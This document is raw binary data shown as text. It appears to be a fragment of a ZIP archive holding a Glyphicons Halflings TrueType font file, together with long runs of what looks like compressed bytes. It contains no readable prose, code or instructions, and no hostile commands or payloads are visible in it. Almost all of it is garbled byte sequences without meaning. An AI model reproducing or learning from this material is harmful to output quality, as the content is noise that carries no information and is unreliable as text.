F��$�+���%U�Z�y���ޗ��ٲR�
�B��)�����wT8��(�a�R�Σ*-�����s�r5v
�!^tZ:/�K,'���F

9��=���G�<��C��u�"$�-��F��S2�(��F
0Q��+X����w�,�]=b�h[q�B�QI�
���;)"�Ō��9��2��6�r?��}l�V�=b�[���j��4�Az���K�kQ?T��[%��$�K�Q�-��l_@l/	&;���차�Dr�?P_d�E1�~�z��^I�~b����r��e�u��f��P�/�պ#�E�+�S\�G�-�R4���	�S���S��V俑;���*`�G��*5'��d�L�
���~����	�5��F���hb`�
�ꁜ���4��[b$~�G�N�AX$���~�}[��W�}��_��z×6m��&~O�%��j/�r�&|_S����y�<��-�*Lϛ���,��JQ�z�ͤ�𫷣�����|�V|�GVW~��<mbl���������B�&��̭j���y��\r=���'�9�H�f)������ԅr�	w��!;;vs��B�7Ӏ��'�k��*��ir�����b�/�K�+ԔW��R��O ���h$!`�1�[�r�����(�a\T�R���"P�?]Y�;?��х�yKRX�W�OCz���ܩ�H�jPn��[��忊�;�͇G��q��Z.�A��.*�@/�)WQHQ���U�L�2^��$,T=Q���(J~�BI�UP�J���=�WC@�ﰉ8&�~D���W�����k�[��<�Տ}�.�"S<#A�>�z	����
�H�����E�	���Y�n���H4�r7P?99���ߡ|O-��5��	�%�4�	dz�O/4�L_Ps��T�>�LQ��D(����J8�F��+)jCb
�Mu�2Xc8$�t�}�&<?��9lW��~�ҿ͑��n��90A�=&W=s�Կ���_V����}�?k�U(�m��utE��*�
�K%�
�t���Z�p�J�� �B�W���P �A�l��(Z�L��zF��Z�}��/��40�l�V	���i%L��^V`�jp�P������5QV��V�k���zX8���^s��ţW4U*u��}�L��8�F� � �~�3��B�"I�/.��O
=7B�JA���K��Q-�|����Vw|()8��C������%ʴ��To�l�s�7*���rev�٢���6m���ǖ	���C�T��pT'ǑpL!�jRC4���}a��Sm���[��%�4a.��첹},�L��B���=�:ݍ'�b����
dm�}V����Y,�t��;���9���Š���	�:\�I5��fDA����u�I���F�H2� @:2	�!�ԏ��j�-��@ٵ�G���`vKcw��I�lar��%l��Es�
��rDe��T��ib����@���d4�����B�DH��T�. ]��K�*��շs�\m�F�:�:��4v��X
��<�;���r�����%���6�aꇷ���ܥG��������ѧ���|��g�у����h��v�qtJ�J��K����H�^v������gp�.��?뜸�B����0�^q�8�|f�S[�t����Cx�Ҕ������׬�f�й
�^�FB�
�Pi��WFpR�U
�:̓�D��}���فv�������}4��z�/���F<���P莣\��U�'c?��4�sJ
���jj>�@��Qr�-��֤��U_o6���q7�P1�ˤ+���rc6�I
�\ �(*v�2��4Uc(A� ̣9�3���]�z����;0'�=���*,e5�6��V�a,�qh�*��P@wȬ�G��/�O�j�|�FIm�	#Pz�;J�wʎ}��<�����zT��t��~�`�ȱGP%;?�5(�(u��#���vՊI���#9,?G����b4K]�Qgԟ]�E[�phʯ���G���+`���Ęp�?�@�>!�}"
�ҽ��r=�C�D5� 62��ZY���?����i��A���
T(�EU�Ju�;"}��պ#��L�c����ӗ�V����W�O��&�CIԙ���u8*烞Q��a�Q^*z(�L�|Jӏ��^�f�p1����0�4~��C��Ux��*r�V�*�N9π�׳�P�ūs��p���_L�������3�Z"}�&�r�O�|l���~���k�C�/Wj><�S�x���M�bS������g(]�J(Z#��x�\$OC6�8-�f:{�S�ҳ蚨o�4:����)���Wb�"u�iu�h��~�d����%����B����AM
s���WH.gv�%��4���v�+����=¿
��S�G�ϋjWHW���u>��[�B{[�u�ɶs�;la�z�i���W߭�\z���C����|��\f����te��&��ߕ+B�k���/t��
�CM��	/@S�>Tm
�G`v�`?������G�(�,zb"���e���A��A�i���7���Q���R<�"i�X��:�I܋(a�V�������;4R��]}����^���1�v�Ե����7���=�p�|�[Jο�e�µ{)�e��#��ief0�K�J�q�"*�F#�(��GjJF�h���X�#ш������ݍk���5E�R�P�΋�	^p�C�eo���e��:��{6�۬��5�͝s��ƙ8�X�K6��V[��=��}V+��hͧ��J��l��ZZ�5��W����;��T��e�V-�@�H��I����D<͙[�)֐����l^b�Xe��NN���"K]�@���b����?.�H�H
gzXa���ْA��}MO�e�X�H�N�r���ڟW�;�ht�gttO�yu3=��*פ���ؿ�C��FGsh9J�ͽZ�-�k��]L-�~h�ii�.�49�Qr5��I,Vݓ��^jf��_}�,��Q6?�5�NV����
ޞˍ�YٜN��%ez��qƨ�>�Z�
��Nt��1� a�%��=� y�hޙ��
H����J�Z��?�	h�vr�k�@�m�Y`�^ins��F\�*�|L�z!/?�)(�0��
MS4(�ȗh��{������-�'�h���o�7�cCҞ�?�6���'|ub�գ@����!�b�Ù�����f{tz��1U�A?=�@���	t%�䕉���iu��[
N��i�D���G�T@�:�p<�(�c�X���Um�2�ϱ7z��O��M^�FϴYUfwGs���#�t:�/�������~�Os�]��F���ݑ��(��(^����?L��$�Sʽ�WzT>m�'_���d�����:��5�Lh;�H7�Wgz�g�Z��Zb3�{2d5�Jj��9�c+���\vqz�Db���b��ƶ�g �"l@צ�p�QB�b��S Q�>��+d	�p���%}�L!��������cdwHo�����p�x(T�p��x��p#�:dvQ
q�dA�QFd�L��K�m�PR��
�pU?�l���
��zg�-�����jP��b��G�aR���&^q���>u�8��p&�Ӯф
�`�MGS������ܵao����WܛZ�aâ�ٟݰ�V5��R�s2NX	�qGB	��O���K�g���BW��)Sg\���ӡl���]z��<߲o-_��-����A��KMqӭ!�æSi�gy����۰]K�;S��T'���kPq��e��e�7cZT{~*�7�b�\H�?�jٵl3��P
��оw�T2��j�Y;�)�l
D�ueytOT���jö���U�H���X�gɬ,��W��Ϣ^���u��![]�v�F���|
�QG�h`(�#	�R�'5X�D��Q��qM�6g�c'b��u�:'��H(�?�yյ����6�~.�e��[n	����*��U�yZs�t�9�R!G��������MM$�x�z��$]��{��L<�}���4���JZ��~�MV�Օhy� >@u����
����+�����]��2FqO8j��ѥ�WC��Qq����rw��.��䄫�ޥ\��_�������y��\O�n�)I�KGR��HŁq���I���.
d+u@ϴ�� �k��Ť}9��T�v6�*x�g�e7?��ì�}�S���-��AU���OMlJ
�p��ժݧ����Yw���h�i6�\fA�Zc,�rjF�T��Mj8kO�51��T���qW�_�n��`�7�%�K����W�s�d0���:��`��OX����s$�4�?:�SI1��W-�Pr}�²���9�.�&�P��^f
�8(�W�I���`��`@5a}�z��i�V �p��PԽ+:��d\j�"=�a�j����)W��$q�{���͜�p)�V���|�7hj������������$�L��֡�9�\���ځn[ ��k{lG���.m�m~�T���E�����b�ȭ�m�`
��w�ny�P&�:P�LJ��Y����_�p�NW����zV��S׃]7��E�d�%i�癬|������E�WM���7r�
��HB���6�`UG�Z���
�9�N2l2��ɅHY��(�ŗ���iw��ݓ[��`�cZ��R;Yz=Tr�vH��9�c.�ֲ�G���6�*p�΅�'�[�:�/�ҪX����CYхM��t��-'�]�n,{@��c��Ob����I�N�.�x�N��F9��뛝N��K��[���X�r=���W�m���ݏ�Ʀ�Y+���?s�J����g�X�u�P���%ȗV^����[��� ����W���;�W�
�xv�i�/��XS3��ȼ�2���ԩZ�<F��=0V�[%�R~ˌ�x���y�s��y?�Θ(O�q_�V-�aQ�*Q1	�t$�j�D�pRR~�zǢ��p�"�]�gw���=�%GV�����rt����>��f�2���/y���?���8�M@�Q��*˄�����C�X��k���?MzTy?���Z��Yu׳)���]͕��1�-�a��7j�~����
.d���
�
��'��������V�z�tXK��2k̹d?��z���z���K�.�>,��BZ��`q��'�k�H�qy����5��j>a���\C��#��H;#p���7l�4�}��IR�7���ފ0����$��=�V������#���_.�v��s�{g><c������_����O���gx���5&�?���̠';z���a��a�:zӑ��Q�Fꉢ��^��MF����9��&��A������Eb���ٽ\�|�3�gE}"+�>��h!���A�b�/p7����=�z����mi�%�͟�3)^O�j�<_�U��NY63dsIr���8E�j����U�*�
33�|v���;��O��B@�,��,��\cwd}6k.�u�k�F9��'��2�6D]e��x�G�J�K.׽}��S��$�@t"�;2ɩ�*�����4��1_��x�7��Q�bj�X����9����Q��;�#��{9��e�I
�-�奐br	B<��9�dpz��IV���Q:l�+�s�i�#=��T��+R��(��M�DC$�
��a�̱	�ONg�j1�9������gqXk��}F����d�����c��G�,���&��.��.^ɷwwc��>�E�_]3��U��|�t{J�f�窂u_�.�\����*�W�=��}�lN���o+^���Ṿ��	v�P�>~��s��T�jWz~_��o�gS�}-��D�Td��-T�Aa��Yf����3,PATcm��
ռ4g�}���m�E$B��w��Ū8�>��9����JW⁩�O��/9�P�JC�XA{,�@c,tEJ��T�j��9��8Q���&� �H���P�l~K%ƞ�1��ѻ�
�-�e�DzxN���Xuz���.9��}�M�c�&�:��Z5��ә8��%յս�m����om�CB�:����l��8�����~��ܦ�E��j�T���YH�Y�v�n�V^IN]]Ž�CXkg#�sc�S��B�$�Ý=�$��k�}cG�&��/��z��}������_��v6<�7����IVGG���g*l�\RXS�T���)�šE��%Y�u��~Q~>X����Ѕ��`9�W��k*�@_ՊpM�]0�*��%�a��3X팁K�M�|�{��FԔ����
췾d7[�n��l��ͬ�D�����@��m�����8����e �cż�#�gH���dd@~.�j�l�lɛ��eRcx�E��((	��K����m¼��G�X�A7��S���@[l��.%���գnMDs�]n�_Q �5�i?z��G�T�G3��T�@e	�i���,���r��
O2<�����l+���/,��%���m�� ��ۚX�n�|�E����]����l�í����[m<�|#�z�+�5�� 7&\5S�-�{��AE��^���t�K�������M�^rq]��Fm�C%2��vJ��)W-�}OM"`�9l�+�=�%"����T�'8�zH3QҐ�ѩ�Y�P~V��ز�Ni���7����ۛ� ��?w1��x�c`d```d��?��o�A�eP��BY�t�?��;�"@.Hc�x�c`d``��
&�]a��A���_x�}S�JA��S<�`���������b)6���>@D��"�X\o��!�����ι{��,_��o�gg��g� ��#J�VYp>uC4�&*�<=$���g9�W@.0��q��- �����;�:pt"H�U�e���5���Vg(�[A�x�9��!�޴�EM���ߗ�4�N�&Ӟ��wj�t���Ԟeσ�Lp�>�w��>G��pfz`�|����^�a�ż�>���)�o�o���M�g+R�m�Rq��,���RJ��1���X�T��N7t�{I�E�\�F��8�U
���mb�:f�N�&��j9�Yx�c``Ђ�M/^0��K�ؘ���ژ�0=avc�c�a>��bĒIJ��k�.�"�/�
�I�8�8�8�q�q�pn�ǥ���5���w�)�^-�8�
||||[�5���?� �JPK�Lp����P��a)��"Z"WDmDW��c3K� �O<H|����D��4�
$�IjHfHN�<"yK򝔙T���o�q�[d�d��<���u�͑�"�G����\���$�K
n
���w(9(MSڡ̧��l�\�|H��
���J��4�G�&�	�{�D��Ԟ���Q��a�Q��Fs��-5-/�m.�*��]:otet;t��i��-һ�ϧ�_��I����A��%C!��u�/�T��f�3V2�3�0�f"a�`��䒩��<�fvf5fw̥��'�_��p�h�8a�e�e�ay�J�*�j��=��wl$ll��5�}cge�cw�^�>�~��/��c�L�uNN+��9K8;9�9/p>�"����k��676��-n�����ܷ���0�����h�8�)�i����ʋ�K�+�s�9�@.xڭ��NA�w��h����
/�"�T�D�#J$��r�qr|�!'�O�3��X�F�ާ�0�wY� �1�fg;73;3��x��E0C�q=���q�X�4���G�A$�x�ZB�8ڃ�	D�w�!��I��a�S���X���w����.�0�?��o��N��؍�gڍ��@\�A�`�sb��
�k`��sݡ}�,�0�Y��aD��ȵȵMyF�Mv�Yd��S����2����0~�>�/�qJ��G
i��<��#c���0�C~G�����9eeKv���в[ڷ{&V(Ө1j�1�M�Zqr�7�,gKܥ�X�����0�����QY{�
���M�Y��жz=���a�:[jEݢ�	��BZ�Z�=n�s�`�+o��̏�x�m�U�SgF���B�]��9I�$uw�-J;m���Pwwwwwwww�l�ޕ���]<3)e��׿7�R�^����V�V�_@��$zГ^��З~�g�`�0m�[�czf`(3233�2�3s2s3�2�������e�D�*95�4X��X�eX��X��1�4i�+�+�
����k�k�����	����[�[�
۲�3�Q�fvd;1�q�gg&����n��LdO�bo�a_�c�@�`�P�p��H��h��X��xN�DN�dNa�r�sgrgs�r�srs	�r�sWrWs
�r�s7r7s�r�swrws�r��������O�O�����/�/�
����o�o�������	����_�_�
����?�?��������f��,˺eݳYϬW�;�M���e���lP68�s䘉�GE{R�α����M���
7����n��ܺ�p;ڛZ��[ݛ�Ƶ?ѵ�ֵykx�~y�j?\3V+wE����5=��QM�jzTӣ��(�v�N؉�k/셽����d/�K���d/�K���d�b�b�b�b�b�b�b�b�b�b�j�j�j�j�j�j�j�j�j�j/������r{���^n/���+�v
;���Na��S�)���Լ�f�f�f�f�f�f�f�f�n�n�n�n�n�n�n�n�n�n�a�a�a�a�a�a�a����C���h�QN��-ܩ�������?�����C�����?�����C�����?�����C�����?�����C�����?��݇�C����}�>t�݇�C����}������C�����?�����C�����?�����C�����?�����C�����?�����v�Nj�HM�p�[q�n����?�?�?�?�?�?�?�>�>�=�<�<�<�<�<�:�:�:�:�:�:�:U�>��:�:�:�:�:�:�:�:�=�;�;�;�;�;�;�;�;�;�;�;�;�}��V��h�S������oTP�PK!�<�\�\�-bizone/fonts/glyphicons-halflings-regular.ttfnu&1i��pFFTMm*���GDEFD OS/2g�k�8`cmapڭ��rcvt (�gasp��glyf}]�o��headM/���6hhea
D��$hmtx�� `�tlocao�����0maxpj��� name�,�����post���5��
�webf�TP�T�=���v�u�vs����Z��2�UKWN@ ����{ ,
�h,
��h@( +�� 
 / _ � �"#%�&&�'	'��	��)�9�I�Y�`�i�y���	��)�9�F�I�Y�i�y�����	���!�'�9�I�Y�`���� *��  / _ � �"#%�&&�'	'���� �0�@�P�`�b�p����� �0�@�H�P�`�p�����	���!�#�0�@�P�`�������f�b���ߵ�i�Y�����!��     
 ������|vpjdc]WQKED�����������5  *+����  
 / / _ _ � � � �""##%�%�&&&�&�'	'	''����	!��&� �)0�0�9:�@�ID�P�YN�`�`X�b�iY�p�ya��k��u��	}���� �)��0�9��@�F��H�I��P�Y��`�i��p�y��������������	�	��������!�!��#�'��0�9��@�I��P�Y	�`�`����������
(���(h .�/<��2��<��2�/<��2��<��23!%3#(@���� ��(�ddLL[27>32+&/#"&/.=/&6?#"&'&546?>;'.?654676X&
�j��

�j�
)"&
�j��

�j�
)L
�j�
)"&
�j��

�j�
)"&
�j��
LL#32!2#!+"&5!"&=463!46��^�����^L�����^�^p@LE32!2+!2++"&=!"&?>;5!"&?>;&'&6;22?69�
��
x
}
x
}���
x
}��
x
v��
���L
���d����d�l
��d��;2#4.#"!!!!32>53#"'.'#7367#73>76��p<�#4@9+820{d���d��	09B49@4#�bk��v$B�dp�d�>u��hi-K0!.O2d22dJtB+"0J+�ku�0�wd/5dW�%�{L�>G!2+!2++"&=!"&?>;5!"&?>;4632654&#�^CjB00BjC� 
x
�
�
��
x
u��
x
u��@--@�$?2O*$$*P2@%d��
��d��
��BVT@��L�!2#!"&=46� ��������%A+32!546;5467.=#"&=!54&'.467>=�2cQQc2��2cQQc2�A7  7A�A7  7A��d[�##�[����[�##�[d��d<c2<2c<��<c2<2c<d1��,�A2632#!"&5467&546�n�,,.x��x�OqUB�Awa�xy�rPEk��d��32!546;'&>76!'� 	
���Pԇ
	 $
op	zy���#��%**%�$	���pd�L#7!2"'&6&546	6'&4#!"&7622?62~
������

�

��\l
��
l��L
��7
����
&
��
��
���

l�������	
2'7'	�&�

c�_"���f���n�
�&\�`�t���f�jpO��32!546;!����������22&&L�%6.676.67646p�'0SFO�$WOHB��XAO�$WOHB��"��7Q)mr	���*`)nq&*	����)2"'#'".4>"2>4&�ȶ�NN;)��w�d��NN�r��VV���VV�N��d�y��%:MN��ȶ�[V���VV���dX�D>.54>�0{xuX6Cy��>>��xC8Zvxy�DH-Sv@9y��UU��y9@vS-H��^{�62!2'%&7%&63�������������� a����o������^{�"62!2'%&7%&63#7'7#'�����������������J��J��N a����o����d�⋌����&2##!"&=467%>="&=46X|�>&	f	
��
	f	&>���|�.hK
�
]

]
�
Kh.�|�
�L#'+/37GKOSW!2#!"&54635)"3!2654&33535!3535!35!"3!2654&35!3535!35~

��
Ud���

&
sd�d d�d d��

&
��d d�d dL
��


ddd
��

^
dd�dddd�ddddd
��

^
ddddd�ddddLL/?!2#!"&546)2#!"&546!2#!"&546)2#!"&5462��pm��p����pm��pL�p��p����p��p�	LL/?O_o�32+"&=46!32+"&=46!32+"&=4632+"&=46!32+"&=46!32+"&=4632+"&=46!32+"&=46!32+"&=462����������������������������L�������p�������p�������L/?O_32+"&=46)2#!"&=4632+"&=46)2#!"&=4632+"&=46)2#!"&=462�����D�������D�������DL�����p�����p����&,� 	62"'&4?622�;��������;������nnBB#	"'	"/&47	&4?62	62������������;���������������%I2"'#".4>"2>4&3232++"&=#"&=46;546�ij�MN,m��w�b��MM�o��XX���XX���
K

K
�
K

K�M��b�y��l+MM��ij�MX���XX���#
K
�
K

K
�
K
����%52"'#".4>"2>4&!2#!"&=46�ij�MN,m��w�b��MM�o��XX���XX�X^

��
�M��b�y��l+MM��ij�MX���XX����
�

�
��-32+"&5465".5472>54&&dd��[���֛[ҧg|r���r|��p��>�ٸu֛[[��u�'>�7�xt�rr�tx�d��/?32+"&54632+"&54632+"&54632+"&=46�

�
�ޖ

�
�ޖ

�
�ޖ

�
�
��

~
�p
�

�
��
�>

�
�
�

�
��GO27'#"/&/&'7'&/&54?6?'6776?6"264X!)&1-�=+P��P08�,2&+!)&1-�<,P
��
P/:�-1&+x�~~�~��P09�,1&+"(&1,�=,Q��Q09�-0&* !(&0-�=,P���~�~~�d�!%)-1!2!2!5463!546!5#!"&53333333�,);
��
;),,;)�D);dddddddd;)d
KK
d);ddd���);;) d�D��D��D��D��62++"&5!+"&5#"&l`
�
�
��
�
�
j`��
��

w��

?
d��3!#!"&5463#"&=X;),��R���p);�vL�p���02".4>"2>4&3232+"&546��֛[[���֛[[����rr���rr�|2
�

�
�[���֛[[���֛;r���rr���

��
2

^
���)#!3333��)�)����������p���,�p��,d��/3232"'&6;4632#!"&546;2!546&��
��
&
��
�T2

��

2
���>�p����
��

^

��
��12".4>"2>4&3232"'&6;46��֛[[���֛[[����rr���rr�|�
�

�
&
�
��[���֛[[���֛;r���rr���

����
��12".4>"2>4&%++"&5#"&762��֛[[���֛[[����rr���rr���
�
�
�

�
&�[���֛[[���֛;r���rr�������

��9!2#!"&'&547>!";2;26?>;26'.��
�������
W
�
&
�
&
�
W�
�t�W
��
��>
�

�
���'2".4>"2>4&&546��֛[[���֛[[����rr���rr�����[���֛[[���֛;r���rr���]�$����(76#!"&?&#"2>53".4>32��
���m�t�rr���r�[���֛[[��u�$���
�Lr���rr�tu֛[[���֛[��576#!"&?&#"#4>323#"'&5463!232>�����n�t�r�[��u��[��u���h
�n�t�r$����Kr�tu֛[��u֛[v�
h�Lr�
d��/?O_o��!2#!"&546!"3!2654&32+"&=463!2#!"&=4632+"&=463!2#!"&=4632+"&=463!2#!"&=4632+"&=463!2#!"&=46}

��
���

R
�2

2
��

�>
�2

2
��

�>
�2

2
��

�>
�2

2
��

�>
�
��

~
�
��

R
d
2

2

2

2
�
2

2

2

2
�
2

2

2

2
�
2

2

2

2
L�#54&#!"#"3!2654&#!546;2�uS��Rvd);;)�);;)��� �SuvR�;)��);;)X);��dLL	732#462#".'.#"#"'&5>763276}2
d�!C@1?*'),GUKx;(.9)-EgPL
��3
0�[;P$

9�7WW��!1A2+"&54. +"&54>32+"&546!32+"&546��ޣc
2
���
2
c�*��`���c��t��

,�rr���

,tޣ���4��4��G�9%6'%&+"&546;2762"/"/&4?'&4?62A		���

�Xx"xx"xx"ww".�
�
�
^
�x"xx"ww"xx"�r�/%6'%&+"&546;2%3"/.7654'&6?6A		���

��
`Z	HN.�
�
�
^
d	���	g~�j�b�1K3#"/.7654&'&6?6%6'%&+"&546;2%3"/.7654'&6?6��D@
	*o;7	*��		���

��
`Z	HN�	��i�T	"��Z�G	!��
�
�
^
d	���	g~�j
��	!%-;?CGKO3#!#!#3!##5!!!!#53#533!3533##5#535#5!!#53#53#53!5!�dd�pd������dX��,�,��dd�dd�D��d��d�dd�,�D,ddd�dd�dd��,�dddX�d�,,�d��,��,�ddd���d��dddd�d��,�ddd��ddd	��#7#3#3#3#3#3!5!#53#53#53ddd�dd����dd,����,�dd�dd,��������Pdd[[[[[
��
	"'463&"26���0�V
C;S;;S;��V�0��
�;;T;;
��
!	"'463!"/	&"26���0�V
��08��D��;S;;S;��V�0��
�V�08���;;T;;d��&!2&54&#!"3!2#!"&54?6,9K@

�D@
�

��
��K�|@
�
@

�J

����L�
!2	46� �>�>�����C��EU!"3!26?6'.#"#!"&/.+";26=463!2;2654&!"3!26/.6�DN9
�
>SV�
N
��
N
�

�

�

�
���
&
X
&�
��l		l-
�p
	�	

	�	

�v

�

�

�
��
�

�
d�L!)13232#!"&546;>35"264$2"&4��8]4$�);;)�);;)�	'3]�d�Ͼ������V<<V<L);;;)��);;)X);E5+��ddF�����<V<<V5�� #	!526/!3!567>?!��(%	
�_5,R�y:"	*2��8��T���2*BBW-ޑY".BB%

�Z�d��'2;#!5>54.'52%32654.+32654&+�50;*7Xml0�);!�9uc>--���Ni*S>v�PR}^��3:R.CuN7Y3(;	G)IsC3[:+	1aJ);4��ePZ��o�!56764.'&'5mSB�	,J���
�95(��1(aaR@	9���%/#4.+!52>5#"#!#3'3#72&�2�p"�&2�KK}}KK}� ��dd	R ,�১ �!����%/#4.+!52>5#"#!5!'7!5L2&�2�p"�&2�C��১ � �vdd	� ,��}KK}}KK�L/?!2#!"&=46!2#!"&=46!2#!"&=46!2#!"&=462X���� ��L��Ldd��dd��dd��dd�L/?!2#!"&=46!2#!"&=46!2#!"&=46!2#!"&=46���D�L�����D�L��Ldd��dd��dd��dd�L/?5463!2#!"&5463!2#!"&5463!2#!"&5463!2#!"&�X���p��� ����L���dd��dd��dd��dd�L/?!2#!"&=46!2#!"&=46!2#!"&=46!2#!"&=462L��L��L��L��Ldd��dd��dd��dd�L/?O_o32+"&=46)2#!"&=4632+"&=46)2#!"&=4632+"&=46)2#!"&=4632+"&=46)2#!"&=462ddA ����ddA ����ddA ����ddA ��Ldddd��dddd��dddd��dddd���L#*:J!#;2+"&=46!2#!"&=465#535!2#!"&=46!2#!"&=46�dd�dd��������,��X��Ldd��dd�}KdK�dd��ddL#*:J32+"&=46#3!2#!"&=463#'7!2#!"&=46!2#!"&=462ddgdd����/�ȧ���,��X��Ldd��L��dd�dK}}�dd��dd���!2#!"&546	K�,,�,,���,�,�v,,�,�D,,�L!2#!"&5467'2"&4,X��J�*J%��pNNpNL��d����>���tNoOOo�6�2.'&54>"264�u�sFE�66	!^Xm)<Ds��������x�us�m�?>!fh�H�uX�yHÂ������2".4>"��֛[[���֛[[�Kt�rr��[���֛[[���֛�oVr���ru�5.54>6?6&'.'&76#&*IOWN>%3Vp}?T�|J$?LWPI�)(!1		) H�uwsu�EG�^F&:c�YE�vsxv���!K�:%A'#"
A)Y��l*/7>%!2!"3!26=7#!"&546	7�l
l��27���);;)�);Ȼ��p���8���7c�s*
s�
�;)�);;)�������������2�c�L6!#"3!2657#!"&546&'5&>75>^i�4�);;)�);ȹ��p���S��9dTX
.9I@F*L�6;)�);;)�g�����������	�
0!;bA4�
�L5!2!"3!26=7#!"&546	62"/&4?622^^<C���);;)�);ȹ��p�����e���eoL�;)�);;)E�ۥ�������3�e���eo

��;	62+3546&=#32"'&6;5#'&47635#"&>
��
��
Ȫ
����
��
��
ȯ
���
ȭ
����
��
��
ȭ
	
��
��L326'+"&546�d��0dL�J���J��L#3266''+"&5462d���0�0dL�J��J���J�J���3''&4766��0�����J�*��J��36&546�.��2����d��32+"&546!32+"&546��������� �� �dL�#!"&5463!2L�� ��� 346&5&546����0d�� *� ��;����O#72#"&5&5&5464646dd�1�2��N���:	��9	�	�>�	�=�,�L32+"&5&54646Rdd�0�L���;��;�d��H	#!"&762!2#!"&=46��	��	�*����9���Hdd���uJ		u��`��(������(&;��(J	'	7(���a���#���aa���32".4>#"#";;26=326=4&+54&��֛[[���֛[[�}d��d���[���֛[[���֛��d��d���2".4>!"3!26=4&��֛[[���֛[[�E���[���֛[[���֛�~dd��32".4>"'&"2?2?64/764/��֛[[���֛[[��	xx		�		xx		�		xx		�		xx		��[���֛[[���֛�	xx		�		xx		�		xx		�		xx		���$2".4>'&"2764/&"��֛[[���֛[[�T��w��[���֛[[���֛�1U��w���;K2".4>";7>32";2>54.#";26=4&��֛[[���֛[[�?<B2!�
�(#"3D<:�

�
�[���֛[[���֛�/O2*(8\6/H*	��
�

�
��>2".4>#";26=4&#";#"3!26=4&+4&��֛[[���֛[[���

�

�

KK

^

K�[���֛[[���֛V
�

�
��
2
�
2

2

��/_3232++"&=.'#"&=46;>7546+"&=32+546;2>7#"&=46;.
�
g��

��g
�
g��

��g�
�
Df�

�fD
�
Df�

�f�
��g
�
g��

��g
�
g��
�ͨ

�fD
�
Df�

�fD
�
Df��?2".4>"2>4&"/"/&4?'&4?62762��֛[[���֛[[����rr���rr�@||@||@||@||�[���֛[[���֛;r���rr���Z@||@||@||@||��02".4>"2>4&"/&4?62762��֛[[���֛[[����rr���rr�j���jO��[���֛[[���֛;r���rr���}j���jO���!2".4>"&32>54��֛[[���֛[[�Kt�rAKi���hst�r�[���֛[[���֛;r�txiKA��>r�tsS��6!2#!'&4'
&����F�
�����

�
&S��	&5!"&=463!46
����&�U
&
�U
#�#
�]�	#!+"&5!"&762��
�����

�
&�����&
�]�32!2"'&63!46&�#

�U
&
�U
#�����
&��]	&5>746
��^���$,[��~U�U
&
�U
#$DuMi��qF
��+!2/"/&4?'&6!"&546762R,^�j�^�!��^�j�^���^�j�^�P,^�j�^IIgg+#!"&546762!2/"/&4?'&6�j�^��^��,^�j�^`j�^,^�����^�j�^��/2".4>#";2676&#";26=4&��֛[[���֛[[���:#6#:1�

�
�[���֛[[���֛���.�
�

�
��IUaho276?67632;2+"!#!54&+"&=46;2654?67>;26/.'&;26!"&5)#!	�&�0


=

2
�p�p
2

=	��
�

3�5�3

���
�X
���

v
	
v
!{,	
2

�,�ԯ

2
0�y�

�
��
�

�r
w��
���+I6.'&&&547>7>'.>7>&67>7>7>�-Bla�b�D8=3�*U 	:1'Ra\�{�%&�=>8\tYR-!�q[Fak[)����ȕX1�"@&J<7_�?3J5%#/D	&/q!!6ROg58<'([@1%@_U2]r�O.>7'&767>.'&'.'&>77>.'&>�'
'8GB 

	`�H 
>JS>H7
'+"	NA
5M[`/Pg!;('2"&"IbY�C�e\D9$886#1%)*����J7gG: 
 8G\au9h�oK$�]54<<E"5cQ8	
.@AU!U�hQ)��j�F?Q2".4>&"&5476&2>76&'&6?6&'&'.��{nO9:On{���{nO:9On{���FZ
2Z_���_Z2Z��#		%8-#,-"F-I\b\I*I\b\I--I\b\I*I\b\I�9>|��|;7Es1$F^D10E^E$1u$/D0
"%,I����';L!#7.54>327377>76&'&%7.5476&6?'&'.P�[�vY,9On{�R=A �&/l�'Pj�R.Mv&6�QFZ
*HLh5)k�|#		%8-,-"xatzbI\b\I-y�R�U�4Zrnc�1�?1FrEs1<QA9
��n;7p$/D0
V,I���('6#!"&%!546;2!32+"&/&6Z�8�%��%
Y
�
Y�Ch�:#6#:d*!�� GD�K

K����d��(2'%/&=47&=4674L|Xk��d��d��k�X>����1)
���]@	��	@]�
)1ES>L�'+/37;?CGKOSW[_c3232!546;546;2!546#!"&5353353353353353533533533533535335335335335Rd2��2d��dddddddddd�|ddddddddd�|ddddddddd�2��222�p���dddddddddd�dddddddddd�ddddddddddw�%7&=#!"&=46;3546'#"&=463!&=#'73546o��������X����z�#���z���*����dX����zd�M�*����z��L!2#!#"&546d�);;)����d);;L;)��);��,;)X);dL�	?32!546!32!546".5!2>&54=��������(Lf���fL(,
'6B6'������p��)IjV\>((>\VjI),�	+'%!	!%'*����L�	'L�����'��a���'�M�	7	M����aa��'��a�Qd_�)!232"/&6;!%+!!"&5#"&?62����*�����������*���������p�&���032!2#!!2+"&=!"&=#"&/#"&468^&�d,!��02*��*�6��%�%+�*2222	
�*�L!53463!2!!��P�;),);�D��P�dd);;)���L3463!2!!���;),*:�,��P, �pX);;)�d�D�Ek�+32"/&6;#"&?62{����*����*������Y�D�k&=!/&4?6!546�������X`�)�	��	�)�	��	��	!.#!"!"3!26=4&53353��$�`$�-�);;)�);;��ddd��-(�d;)d);;)d);�dddd��d�L#12"&54%##"+"&'=454>;%".=4>7i**d�]&/T7���"L��R����Q�
���)2(Jf�,53232#"./.46;7>7'&6327"&)^Sz?vdj�O9t\U>/v?zS$24517F8�%M���)(
()�GM~ ��1==��7'''7'7'7'77 �N괴�N�-��-�N괴�N�-���N�-��-�N괴�N�-��-�N괴d��!-=32!2+"&/#"&54?>335!7532+"&546�2(<H(<�,�F=-7�`
1d�d���>2�vdd�Q,�}Q,d-��!2$'�$��(d���dw}�����L 0<32#!+"&/&546;632+"&546!#35'!5X�,�<(��<(21
`�7-=|��dd_�d�d22�L!��-d,Qv�,Q(��$�'$dd��d���ԯ�}wdO7G%6!2+#!"&5467!>;26&#!*.'&?'32+"&546dkn
T.TlnTj����:d%���8
	�V�Oddi�p
&yL�N��(�

%
H�	YS(22�S�����d�O6F#!"&'#"&463!'&6?6*#!32!7%32+"&546�n
����jUmlT.U
nJ�	
�%��&j��PddO���
�(SN�Ly&
p��d(��Y�����aL7G2#!"&/&?>454&/!7%.!2#!"&=46ސNS(�
��%
	�p
&y�22�S��Y��(���nTj����kn
T.T���8
	�V��d%��dd���-I!26=4&#!""&5&/&7>3!2766=467%'^��N�Ly&
p�

�(���S�22(SYLdd��jTnlT.T
nk�����V�	
�8��%d��%2".4>%&!"3!7%64��֛[[���֛[[������

�[���֛[[���֛�9�
�
�
�

�
&��%2".4>
6=!26=4&#!54&��֛[[���֛[[�%��

���[���֛[[���֛��
&
�
�
�
�
��%2".4>&";;265326��֛[[���֛[[�K�
&
�
�
�
�
